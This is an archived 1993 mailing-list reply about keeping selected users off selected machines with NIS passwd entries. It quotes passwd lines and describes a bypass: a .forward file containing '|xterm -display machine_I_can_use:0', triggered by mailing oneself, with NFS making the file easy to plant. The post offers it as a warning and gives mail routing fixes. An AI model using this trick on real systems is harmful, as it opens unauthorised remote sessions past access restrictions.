Re: Summary of How to disallow selected users access to selected machines

From: Rob Quinn (rjq@phys.ksu.edu)
Date: Fri Apr 16 1993 - 10:41:51 CDT


In <1qm4neINNlr3@sbusol.rz.uni-sb.de> et11ltab@sbusol.rz.uni-sb.de (Alexander Bachmann) writes:
>+@restricted-group:*:0:0:::/usr/local/sh/no-access
>+::0:0:::
>We don't remove remove the NIS passwd entries for users with -user
>(or -@netgroup) because this will cause trouble with email, when a
>user is not known on the mail-server.

 I have successfully broken into (my own) machines this way. Create a .forward
with something like '|xterm -display machine_I_can_use:0' in it and then send
yourself some mail. With NFS disks, it's easy to create .forwards on other
machines.
 If you do go with the '-@netgroup' option, make sure local mail sent out has
full hostnames so that when a user on a restricted machine replies to mail from
a restricted user it won't be a local delivery to the restricted machine. Or
use a central mailhost/MX stuff and deliver all mail on one machine only.
(Did that make sense?)

--
| "Those who suppress freedom always                             Rob Quinn |
| do so in the name of law                                rjq@phys.ksu.edu |
| and order." --John Lindsay                         QuinnBob@KSUVM.BITNET |



This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:07:45 CDT